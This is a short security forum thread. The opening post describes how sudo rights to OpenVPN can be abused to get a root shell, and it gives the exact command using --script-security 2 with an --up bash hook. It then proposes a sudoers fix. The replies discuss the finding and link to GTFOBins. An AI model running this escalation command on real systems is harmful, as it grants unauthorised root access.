Pretty Niche: OpenVPN as a vector for privilege escalation – Digitalmunition




Home Forums Pretty Niche: OpenVPN as a vector for privilege escalation

This topic contains 1 reply, has 2 voices, and was last updated by  crooq42 4 weeks, 1 day ago.

  • Author
    Posts
  • #323790

    anonymous
    Participant

    Not sure how applicable this will be to everyone as it’s pretty niche as a setup.

    If you’re a non root user with sudoer (/etc/sudoers.d/<username>) permission to openvpn, as in with a line saying:

    /usr/sbin/OpenVPN *

    I found this on a server providing a secured VPN connection.

    You can obtain root shell using:

    Sudo OpenVPN –remote 1.2.3.4 –dev tun –script-security 2 –up “/bin/bash -c ‘sudo -u root /bin/bash -i”

    The script security 2 is what allows the command to run user scripts. You can replace my command with any executable script path and it will run as the root OpenVPN user.

    You can fix this vulnerability by changing the sudoers file to:

    /usr/sbin/OpenVPN * –script-security 0

    Any Sudo commands run will have to pass that flag at the end, and this overwrites any previous script security designations.

    This is in a programatic environment so it’s easy to implement without user issue. But this may not be ideal with users interacting through the command line. There may be a better way to fix it, but I thought I’d share anyway.

    The root user was meant to be disabled on this server. It’s meant to be completely locked down. The OpenVPN user needed the permission to startstop/restart OpenVPN itself.

  • #323791

    crooq42

    This isnt really a vulnerability, seems more like a feature working as intended. If you have sudo access you can already open a root shell and do anything root can do. Good effort though, keep up the bug hunts!

    Edit: misunderstood it a bit, guess you could elevate to a full root shell with only sudo access to open vpn. Not a likely setup but still a good find

  • #323792

    INIT_6

    Hell yeah, these are great little bugs. Feels like a weird edge case the dev didn’t think about.

    This kind of stuff reminds me of Unquoted Service Path vulnerabilities in windows. Happens all the time, but when it happens to popular software it creates a huge splash.

  • #323793

    jalgroy

    There are a ton of programs that can give you a root shell if you have sudo access to them. Have a look at [GTFOBins](https://gtfobins.github.io/#+shell)

You must be logged in to reply to this topic.